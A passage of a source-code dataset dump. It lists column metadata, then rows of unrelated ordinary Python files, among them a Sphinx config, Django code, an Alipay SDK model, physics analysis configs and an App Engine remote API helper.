blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6c4ea1a55aa1857a24e8392dc9ee83a4a26653d2 | e29409a3128165f1cd9d698c3b44e883b23a518e | /doc/conf.py | 27d308bdcfb17afbd685096ed676923609206b51 | [
"BSD-2-Clause"
] | permissive | renefritze/nb2plots | e5b69e2e8fdcb947f44833e7a2fb7df76e079086 | ad269b151c746eb0072aa8f03a31121a39012522 | refs/heads/master | 2020-09-21T18:19:09.267839 | 2019-12-05T12:14:56 | 2019-12-05T15:53:18 | 224,879,955 | 0 | 0 | NOASSERTION | 2019-11-29T15:35:20 | 2019-11-29T15:35:20 | null | UTF-8 | Python | false | false | 10,244 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# nb2plots documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 16 08:41:58 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.mathjax',
'sphinx.ext.githubpages',
'texext.math_dollar',
'numpydoc',
'nb2plots',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'nb2plots'
copyright = '2016-2018, Matthew Brett'
author = 'Matthew Brett'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
import nb2plots
release = nb2plots.__version__
# The short X.Y version.
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', 'README.rst']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = 'nb2plots v0.4'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'nb2plotsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'nb2plots.tex', 'nb2plots Documentation',
'Matthew Brett', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# It false, will not define \strong, \code, itleref, \crossref ... but only
# \sphinxstrong, ..., \sphinxtitleref, ... To help avoid clash with user added
# packages.
#
# latex_keep_old_macro_names = True
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'nb2plots', 'nb2plots Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'nb2plots', 'nb2plots Documentation',
author, 'nb2plots', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
markdown_http_base = 'https://matthew-brett.github.io/nb2plots'
# Doctest configuration. Use older numpy array representation.
doctest_global_setup = 'from nb2plots.testing import setup_test; setup_test()'
| [
"[email protected]"
] | |
40c2680cba8adb4f45b6f169538fa7388bd4ffaf | ccd1dced3b39f970c4d1b41f03d372b71a360194 | /property/migrations/0007_category_image.py | ab56a4074b926265ba07b2dd955a4f49c3fd6011 | [] | no_license | joescaos/hotel-ecommerce-site | 5ab815f85b7e4d09a06b963a7785010c068a24d8 | 0b40aaf73d0d6241df88fa4dfe6fa63d868ee9aa | refs/heads/master | 2022-09-29T07:59:02.474986 | 2020-06-06T00:51:55 | 2020-06-06T00:51:55 | 269,823,623 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | # Generated by Django 3.0.5 on 2020-05-31 01:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('property', '0006_auto_20200521_2139'),
]
operations = [
migrations.AddField(
model_name='category',
name='image',
field=models.ImageField(null=True, upload_to='category/'),
),
]
| [
"[email protected]"
] | |
b8e08f8929644608f02c3d6e6fc8a410cd9c05cd | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayFundEnterprisepayMemberModifyModel.py | d1d2f85425b69bf336ad21837ecf8dd2b333fe2d | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 6,152 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.FundExtInfo import FundExtInfo
class AlipayFundEnterprisepayMemberModifyModel(object):
def __init__(self):
self._account_id = None
self._agreement_no = None
self._biz_scene = None
self._fund_ext_info = None
self._group_id_list = None
self._open_id = None
self._operation_type_list = None
self._product_code = None
self._user_id = None
@property
def account_id(self):
return self._account_id
@account_id.setter
def account_id(self, value):
self._account_id = value
@property
def agreement_no(self):
return self._agreement_no
@agreement_no.setter
def agreement_no(self, value):
self._agreement_no = value
@property
def biz_scene(self):
return self._biz_scene
@biz_scene.setter
def biz_scene(self, value):
self._biz_scene = value
@property
def fund_ext_info(self):
return self._fund_ext_info
@fund_ext_info.setter
def fund_ext_info(self, value):
if isinstance(value, FundExtInfo):
self._fund_ext_info = value
else:
self._fund_ext_info = FundExtInfo.from_alipay_dict(value)
@property
def group_id_list(self):
return self._group_id_list
@group_id_list.setter
def group_id_list(self, value):
if isinstance(value, list):
self._group_id_list = list()
for i in value:
self._group_id_list.append(i)
@property
def open_id(self):
return self._open_id
@open_id.setter
def open_id(self, value):
self._open_id = value
@property
def operation_type_list(self):
return self._operation_type_list
@operation_type_list.setter
def operation_type_list(self, value):
if isinstance(value, list):
self._operation_type_list = list()
for i in value:
self._operation_type_list.append(i)
@property
def product_code(self):
return self._product_code
@product_code.setter
def product_code(self, value):
self._product_code = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.account_id:
if hasattr(self.account_id, 'to_alipay_dict'):
params['account_id'] = self.account_id.to_alipay_dict()
else:
params['account_id'] = self.account_id
if self.agreement_no:
if hasattr(self.agreement_no, 'to_alipay_dict'):
params['agreement_no'] = self.agreement_no.to_alipay_dict()
else:
params['agreement_no'] = self.agreement_no
if self.biz_scene:
if hasattr(self.biz_scene, 'to_alipay_dict'):
params['biz_scene'] = self.biz_scene.to_alipay_dict()
else:
params['biz_scene'] = self.biz_scene
if self.fund_ext_info:
if hasattr(self.fund_ext_info, 'to_alipay_dict'):
params['fund_ext_info'] = self.fund_ext_info.to_alipay_dict()
else:
params['fund_ext_info'] = self.fund_ext_info
if self.group_id_list:
if isinstance(self.group_id_list, list):
for i in range(0, len(self.group_id_list)):
element = self.group_id_list[i]
if hasattr(element, 'to_alipay_dict'):
self.group_id_list[i] = element.to_alipay_dict()
if hasattr(self.group_id_list, 'to_alipay_dict'):
params['group_id_list'] = self.group_id_list.to_alipay_dict()
else:
params['group_id_list'] = self.group_id_list
if self.open_id:
if hasattr(self.open_id, 'to_alipay_dict'):
params['open_id'] = self.open_id.to_alipay_dict()
else:
params['open_id'] = self.open_id
if self.operation_type_list:
if isinstance(self.operation_type_list, list):
for i in range(0, len(self.operation_type_list)):
element = self.operation_type_list[i]
if hasattr(element, 'to_alipay_dict'):
self.operation_type_list[i] = element.to_alipay_dict()
if hasattr(self.operation_type_list, 'to_alipay_dict'):
params['operation_type_list'] = self.operation_type_list.to_alipay_dict()
else:
params['operation_type_list'] = self.operation_type_list
if self.product_code:
if hasattr(self.product_code, 'to_alipay_dict'):
params['product_code'] = self.product_code.to_alipay_dict()
else:
params['product_code'] = self.product_code
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayFundEnterprisepayMemberModifyModel()
if 'account_id' in d:
o.account_id = d['account_id']
if 'agreement_no' in d:
o.agreement_no = d['agreement_no']
if 'biz_scene' in d:
o.biz_scene = d['biz_scene']
if 'fund_ext_info' in d:
o.fund_ext_info = d['fund_ext_info']
if 'group_id_list' in d:
o.group_id_list = d['group_id_list']
if 'open_id' in d:
o.open_id = d['open_id']
if 'operation_type_list' in d:
o.operation_type_list = d['operation_type_list']
if 'product_code' in d:
o.product_code = d['product_code']
if 'user_id' in d:
o.user_id = d['user_id']
return o
| [
"[email protected]"
] | |
8dd0a54e2c18cc359f8bbc9a5a06659f45269823 | 4efd4fe7e848dc5973e350516ebfb57be015f5b6 | /inline_media/tests/parser.py | 111038f50b1f76514967b44f63baef82dc66db13 | [
"BSD-2-Clause",
"CC-BY-2.5"
] | permissive | MechanisM/django-inline-media | 468648eb7a8b909a4204fc3c05788a73988a7855 | e3ef3def173bcc9ac540123afe467894b635db85 | refs/heads/master | 2021-01-19T08:23:07.228198 | 2012-02-22T18:09:10 | 2012-02-22T18:09:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,221 | py | #-*- coding: utf-8 -*-
import os
import shutil
import tempfile
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase as DjangoTestCase
from inline_media.models import InlineType
from inline_media.parser import MySoup, inlines, render_inline
from inline_media.widgets import TextareaWithInlines
from inline_media.tests.models import MediaModelTest
selfClosingTags = ['inline','img','br','input','meta','link','hr']
class ParserTestCase(DjangoTestCase):
def setUp(self):
test_content_type = ContentType.objects.get(app_label="tests", model="modeltest")
InlineType.objects.create(title="testobj", content_type=test_content_type)
self.obj = MediaModelTest.objects.create(title="The Title", description="Blah blah ...")
self.tag = u'<inline type="%(type)s" id="%(id)d" class="%(class)s" />' % {
"type": "tests.mediamodeltest", "id": self.obj.id, "class": "inline_small_left" }
def test_render_inline(self):
soup = MySoup(self.tag, selfClosingTags=selfClosingTags)
rendered_inline = render_inline(soup.find("inline"))
self.assert_(rendered_inline.get("context", None) != None)
self.assert_(rendered_inline.get("template", None) != None)
self.assert_(rendered_inline["context"]["object"] == self.obj)
self.assert_(rendered_inline["context"]["class"] == u'inline_small_left')
self.assert_(rendered_inline["context"]["content_type"] == u'tests.mediamodeltest')
self.assert_(rendered_inline["template"] == u'inline_media/tests_mediamodeltest.html')
def test_inlines_with_return_list_false(self):
html_content = inlines(self.tag, return_list=False)
self.assertEqual(
'<div class="inline_small_left"><H3>The Title</H3><p>Blah blah ...</p></div>\n',
html_content)
def test_inlines_with_return_list_true(self):
inline_list = inlines(self.tag, return_list=True)
self.assert_(len(inline_list) == 1)
self.assert_(inline_list[0]["object"] == self.obj)
self.assert_(inline_list[0]["class"] == u'inline_small_left')
self.assert_(inline_list[0]["content_type"] == u'tests.mediamodeltest')
| [
"[email protected]"
] | |
ae75a4e4e98e779462934871276bedbdd4d46e90 | 431a1f738b1edfba7dad8d10a6b7520d51d917cb | /Samples/UserSamples/2018/ggH_Splits/ggH2Config.py | 88310b478b17319c11136fe426fcd9265a083a66 | [] | no_license | aloeliger/DatacardCreator | 5ce702e46fbb77e843b44d8fe088c2645a4a8f66 | 5c7e890276a5be079ed3b677a471c1dcadcba52d | refs/heads/master | 2022-02-26T19:52:30.563747 | 2022-02-16T20:24:48 | 2022-02-16T20:24:48 | 215,602,523 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,253 | py | from Samples.SampleDefinition import Sample
from Samples.Uncertainties.UserUncertainties.TES import TESUncertainty
from Samples.Uncertainties.UserUncertainties.JES import JESUncertainty
from Samples.Uncertainties.UserUncertainties.ggHTheory import ggHTheoryUncertainty
from Samples.Uncertainties.UserUncertainties.MetRecoil import MetRecoilUncertainty
from Samples.Uncertainties.UserUncertainties.MuonES import MuonESUncertainty
from Samples.Uncertainties.UserUncertainties.TauID import TauIDUncertainty
from Samples.Uncertainties.UserUncertainties.Trigger17_18 import Trigger1718Uncertainty
from Samples.EventDefinition.UserEventDictionaries.MuTauEventDictionary import MuTauEventDictionary
ggHSample = Sample()
ggHSample.name = 'ggH_htt125'
ggHSample.path = '/data/aloeliger/SMHTT_Selected_2018_Deep/'
ggHSample.files = ['ggH.root']
ggHSample.definition = ''
ggHSample.uncertainties = [
TESUncertainty(),
JESUncertainty(),
ggHTheoryUncertainty(),
MetRecoilUncertainty(),
MuonESUncertainty(),
TauIDUncertainty(),
Trigger1718Uncertainty(),
]
ggHSample.eventDictionaryInstance = MuTauEventDictionary
ggHSample.CreateEventWeight = ggHSample.CreateEventWeight_Standard
ggHSample.startEntry = 30100
ggHSample.endEntry = 60200
| [
"[email protected]"
] | |
8e37aac511b0cae4341fac4bc5e433d598934167 | f3b233e5053e28fa95c549017bd75a30456eb50c | /mcl1_input/L41/41-35_wat_20Abox/set_2.py | 0d09b429cc615aa8547489fd53727cb51b0633aa | [] | no_license | AnguseZhang/Input_TI | ddf2ed40ff1c0aa24eea3275b83d4d405b50b820 | 50ada0833890be9e261c967d00948f998313cb60 | refs/heads/master | 2021-05-25T15:02:38.858785 | 2020-02-18T16:57:04 | 2020-02-18T16:57:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | import os
dir = '/mnt/scratch/songlin3/run/mcl1/L41/wat_20Abox/ti_one-step/41_35/'
filesdir = dir + 'files/'
temp_prodin = filesdir + 'temp_prod_2.in'
temp_pbs = filesdir + 'temp_2.pbs'
lambd = [ 0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738, 0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078]
for j in lambd:
os.chdir("%6.5f" %(j))
workdir = dir + "%6.5f" %(j) + '/'
#prodin
prodin = workdir + "%6.5f_prod_2.in" %(j)
os.system("cp %s %s" %(temp_prodin, prodin))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, prodin))
#PBS
pbs = workdir + "%6.5f_2.pbs" %(j)
os.system("cp %s %s" %(temp_pbs, pbs))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, pbs))
#submit pbs
#os.system("qsub %s" %(pbs))
os.chdir(dir)
| [
"[email protected]"
] | |
3d11100956a6fec50f50a061926d77f2677a4c40 | a62d603a0b31ccd77f9b2035c2740d4d25f2408d | /artistforum/artistforum/urls.py | b2b0502da749d37a8d5dbe8825c2d844170f78a6 | [] | no_license | shushantkumar/Projects | 44751949c2787e1ae4bb3909e0b37a6210680352 | e6ce305dc80ec7bd258e213271d0292f8f1e3cfd | refs/heads/master | 2021-01-02T22:34:35.854166 | 2018-04-22T07:30:37 | 2018-04-22T07:30:37 | 99,346,113 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | """artistforum URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from django.conf.urls import url
# from artist.views import redirectToAuth,yellowantRedirectUrl
from artist.views import redirectToAuth,yellowantRedirectUrl
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('artist.urls')),
path('getyaauthurl/',redirectToAuth,name='redirectToAuth'),
path('redirecturl/',yellowantRedirectUrl, name = 'yellowantRedirectUrl')
]
| [
"[email protected]"
] | |
5ced8005d7ca2b0d24eada8cddaa00c4a3825af9 | 696c1a00fbf09da67c37de2406c5394a5edcb166 | /tests/combined_model_tests/combined_model_tests.py | 4854a4daeffff3293082bec9ada559fe26bfd617 | [] | no_license | mengyx-work/xgboost_hyperopt | 7f52c5aa3fff81d029e3879630b373d79c4155bb | bbd80c489cb308309d45f1de1cc2676b13e29b6b | refs/heads/master | 2021-01-15T15:41:38.622028 | 2017-05-14T21:05:46 | 2017-05-14T21:05:46 | 55,736,994 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,312 | py | import pandas as pd
import numpy as np
import os, sys, time
import yaml
import cPickle as pickle
sys.path.append('/home/ymm/kaggle/xgboost_hyperopt')
from utils.bosch_functions import load_processed_bosch_data
from utils.models import CombinedModel
from utils.validation_tools import score_MCC, MCC, create_validation_index, cross_validate_model
dep_var_name = 'Response'
## params for combined model
raw_models_yaml_file = 'raw_combined_models.yml'
trained_model_yaml_file = 'trained_combined_model.yml'
project_path = './tmp'
raw_models_yaml_path = './'
## 15 bins data
project_yml_path = '/mnt/home/ymm/kaggle/compete/current'
data_path = '/home/ymm/kaggle/bosch_data/bosch_complete_processed_15_bins_data'
data_yaml_file = 'bosch_processed_data_dict.yml'
train = load_processed_bosch_data(data_path, data_yaml_file, data_index='0', nrows=10000)
## train the comined model
combined_model_params = {}
combined_model_params['raw_models_yaml_file'] = raw_models_yaml_file
combined_model_params['raw_models_yaml_path'] = raw_models_yaml_path
combined_model_params['project_path'] = project_path
combined_model_params['models_yaml_file'] = trained_model_yaml_file
## build the combined model
combined_model = CombinedModel(combined_model_params)
## warning! the multiple combined tests will overwite each ohter's results
#'''
############## Section of regular validation #######################
train_index, valid_index = create_validation_index(train, 0.5, dep_var_name, True)
valid_data = train.ix[valid_index]
tmp_train = train.ix[train_index]
combined_model.fit(train, dep_var_name)
pred_df = combined_model.predict(valid_data)
print 'MCC score from validation: ', MCC(valid_data[dep_var_name], pred_df)
#print score_MCC(valid_data[dep_var_name], pred_df)
#'''
#'''
############## Section of using cross validation #######################
## cross-validate any combined model
results = cross_validate_model(train, dep_var_name, combined_model, score_MCC, 3)
print results
#'''
############## Section of cross_valiate fit #######################
combined_model.cross_vlidate_fit(train, dep_var_name)
pred_df = combined_model.predict(valid_data, score_conversion_type='A')
print 'MCC score from cross_valiate_fit: ', MCC(valid_data[dep_var_name], pred_df)
| [
"[email protected]"
] | |
7168d5ad5f15baa04059a1819cae512b8d6ccff2 | cf4e5165a8408344a4c62e63a0fd2d0fe6308b37 | /15期/15 flask框架/13-使用蓝图划分模块/orders.py | a78452943880b1d6638e7eeb4f45bfaf6f0516f5 | [] | no_license | kennycaiguo/Heima-Python-2018 | 5f8c340e996d19f2b5c44d80ee7c144bf164b30e | a8acd798f520ec3d079cc564594ebaccb9c232a0 | refs/heads/master | 2021-01-08T10:54:18.937511 | 2019-09-01T14:37:49 | 2019-09-01T14:37:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 331 | py | # coding=utf-8
from flask import Flask, Blueprint
# 创建蓝图对象,蓝图就是一个小模块的概念
app_orders = Blueprint("app_orders", __name__, template_folder="templates")
@app_orders.route("/get_orders")
def get_orders():
return "get orders page"
@app_orders.route("post_orders")
def post_orders():
pass
| [
"[email protected]"
] | |
a849ea55c243f6df2ba62ce912a03beb7a554c9b | bfc0a74a378d3692d5b033c21c29cf223d2668da | /unittests/pytests/utils/TestPylith.py | de1c2d7ed43609cfec1e7c351ee3ff7dead84b91 | [
"MIT"
] | permissive | rishabhdutta/pylith | b2ed9cd8039de33e337c5bc989e6d76d85fd4df1 | cb07c51b1942f7c6d60ceca595193c59a0faf3a5 | refs/heads/master | 2020-12-29T01:53:49.828328 | 2016-07-15T20:34:58 | 2016-07-15T20:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,347 | py | #!/usr/bin/env python
#
# ======================================================================
#
# Brad T. Aagaard, U.S. Geological Survey
# Charles A. Williams, GNS Science
# Matthew G. Knepley, University of Chicago
#
# This code was developed as part of the Computational Infrastructure
# for Geodynamics (http://geodynamics.org).
#
# Copyright (c) 2010-2016 University of California, Davis
#
# See COPYING for license information.
#
# ======================================================================
#
## @file unittests/pytests/utils/TestPylith.py
## @brief Unit testing of Pylith module.
import unittest
# ----------------------------------------------------------------------
class TestPylith(unittest.TestCase):
"""
Unit testing of Pylith object.
"""
def test_sizeofVoidPtr(self):
"""
Test sizeofVoidPtr().
"""
from pylith.utils.utils import sizeofVoidPtr
size = sizeofVoidPtr()
return
def test_sizeofPylithScalar(self):
"""
Test sizeofPylithScalar().
"""
from pylith.utils.utils import sizeofPylithScalar
size = sizeofPylithScalar()
self.failUnless(4 == size or 8 == size)
return
def test_isCUDAEnabled(self):
"""
Test constructor.
"""
from pylith.utils.utils import isCUDAEnabled
value = isCUDAEnabled()
return
# End of file
| [
"[email protected]"
] | |
cccc2caec8badcd13bf957235949812bb9349150 | 6ed48bf3c72e61fe53144a3545ab305112c93501 | /appengine/findit/util_scripts/remote_api.py | d49a94ae16abf3e15f56036cd09699fb730490c3 | [
"BSD-3-Clause"
] | permissive | eunchong/infra | ee5f7a9379977de8c814f90dbba3f6adbf06a75c | ce3728559112bfb3e8b32137eada517aec6d22f9 | refs/heads/master | 2022-11-27T06:26:57.415805 | 2016-04-08T12:34:36 | 2016-04-08T12:34:36 | 55,699,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,991 | py | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module is used to set up Remote API to use services on App Engine.
After setup, available services include datastore, task queue, etc.
You may be prompted for credentials during the remote query or the like.
And you could use Remote API only when you are one of the project members.
For detail on usage of Remote API, please refer to:
https://cloud.google.com/appengine/docs/python/tools/remoteapi
"""
import os
import socket
import sys
_FINDIT_ROOT_DIR = os.path.join(os.path.dirname(__file__), os.path.pardir)
_APPNGINE_SDK_DIR = os.path.join(_FINDIT_ROOT_DIR, os.path.pardir,
os.path.pardir, os.path.pardir,
'google_appengine')
# Add App Engine SDK dir to sys.path.
sys.path.insert(1, _APPNGINE_SDK_DIR)
import dev_appserver
dev_appserver.fix_sys_path()
# Add Findit root dir to sys.path so that modules in Findit would be available.
sys.path.insert(1, _FINDIT_ROOT_DIR)
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from google.appengine.ext.remote_api import remote_api_stub
def SetTimeoutForUrlOperations(url_blocking_operations_timeout=600):
"""Set timeout for url operations (socket, appengine db)."""
socket.setdefaulttimeout(url_blocking_operations_timeout)
urlfetch.set_default_fetch_deadline(url_blocking_operations_timeout)
def EnableRemoteApi(app_id='findit-for-me'):
"""Enable appengine services through remote API.
Args:
app_id (str): The appengine ID without '.appspot.com', eg. findit-for-me.
"""
if hasattr(EnableRemoteApi, app_id):
return
SetTimeoutForUrlOperations()
remote_api_stub.ConfigureRemoteApiForOAuth(
'%s.appspot.com' % app_id,
'/_ah/remote_api',
secure=True,
save_cookies=True)
setattr(EnableRemoteApi, app_id, True)
| [
"[email protected]"
] | |
117c969597f63a06bb56b3e40e60ba582e8ba33d | e1f87c26f973bd31da1f53dfef37ff4a8c7fd0b6 | /packs/github/sensors/github_repository_sensor.py | 80f7b909a2eb52584b114f38e3945c6d1560e86d | [
"Apache-2.0"
